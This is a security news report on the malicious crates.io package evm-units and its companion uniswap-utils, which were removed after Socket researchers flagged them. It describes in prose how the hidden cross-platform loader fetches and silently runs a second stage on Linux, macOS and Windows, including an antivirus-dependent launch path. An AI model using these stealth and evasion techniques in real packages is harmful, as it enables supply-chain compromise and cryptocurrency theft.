A malicious Rust package that was found to be downloading payloads aimed at stealing cryptocurrency was removed from the crates.io Rust package registry, along with another package by the same author that appeared benign but was dependent on the first.

The crates.io team removed both packages this week after security researchers with Socket alerted it about them. That said, by that time, they had been in the registry for eight months, with the malicious package – evm-units – having been downloaded 7,257 times and the other – uniswap-utils – 7,441 times.

Thirteen versions of evm-units targeting Web3 developers were published in April, along with 14 versions of the uniswap-utils dependency package, the crate.io team wrote in a notice.

According to the Socket Threat Research team, the evm-units package – which passed itself off as an EVM version helper – could target systems running Windows, Linux, and macOS. An EVM version helper is used to help developers working with different versions of EVM, or Ethereum Virtual Machine. Uniswap is a helper library for an EVM.

Malicious Package Appeared Legitimate

Socket threat researcher Olivia Brown wrote that the malicious package running on developer systems would appear to return the Ethereum version number to the unsuspecting victim. That, combined with the ability to run on multiple operating systems and the targeting of systems with Qihoo 360 – a Chinese antivirus tool – “suggests that the threat actor is focusing on Asian markets, as Qihoo 360 is a Chinese-made antivirus with a dominant market share throughout Asia,” Brown wrote in a report.

The compromise would begin when the victim called get_evm_version(), which helped cloak the nature of the threat by performing a real and plausible task, including returning the actual version number defined in the malicious code, she wrote.

“However, calling that function to check the version number begins a series of steps eventually leading to compromise,” Brown added.

The call defined an encoded URL that hid it from view and allowed it to evade analysis, and led to the payload being fetched and executed. It would execute a different check() function depending on the OS on the developer’s system.

A Stealthy Threat

She wrote about the malware’s stealthy nature that allowed it to run its operations out of sight of the victims. In Linux systems, it downloads a script from the threat actor and saves it in /tmp/init and runs it in the background using “nohup bash.”

“There is no window, no output, no logs printed, so the victim never sees anything,” Brown wrote. “The attacker’s script gains full control, allowing it to run any commands or install any payloads the attacker chooses.”

With macOS systems, the malware downloaded a file called “init” into the system temp folder and executed it using “osascript” in the background, again with “nohup.”

“This again quietly runs the attacker’s AppleScript with no windows, no notifications, and no output, enabling silent second-stage infection,” she wrote.

On Windows systems, one of the malware’s tasks is checking for the presence of the Qihoo 360 antivirus software.

“If Qihoo 360 is not present, it creates a VBScript that runs a hidden PowerShell script with no visible window, and writes that script into the temp directory,” Brown wrote. “The malware now has two ways to launch. If there is no antivirus, it will launch through the VBScript. Otherwise, if there is Qihoo 360 present, the malware will launch by directly calling PowerShell with no window and no logs printed to the console.”

A Focus on Asia

She added that the “focus on Qihoo 360 is a rare, explicit, China-focused targeting indicator, because it is a leading Chinese internet company. It fits the crypto-theft profile, as Asia is one of the largest global markets for retail cryptocurrency activity.”

In addition, with all three platforms, the bad actor used a feature designed to protect malware against defensive measures and allow the attacker to easily rotate servers and use self-signed certificates.

The malicious Rust package is the latest example in a growing trend of hackers hiding malware inside of open source ecosystems, including npm and GitHub. This is especially true in crypto infrastructure, she wrote. The threat actor behind the Rust malware, called “ablerust,” was able to embed a cross-platform, second-stage loader inside a function that seemed harmless.

“As supply chain compromises continue to increase in sophistication, organizations must remain vigilant when using open source code, as any package may contain hidden behavior,” Brown wrote.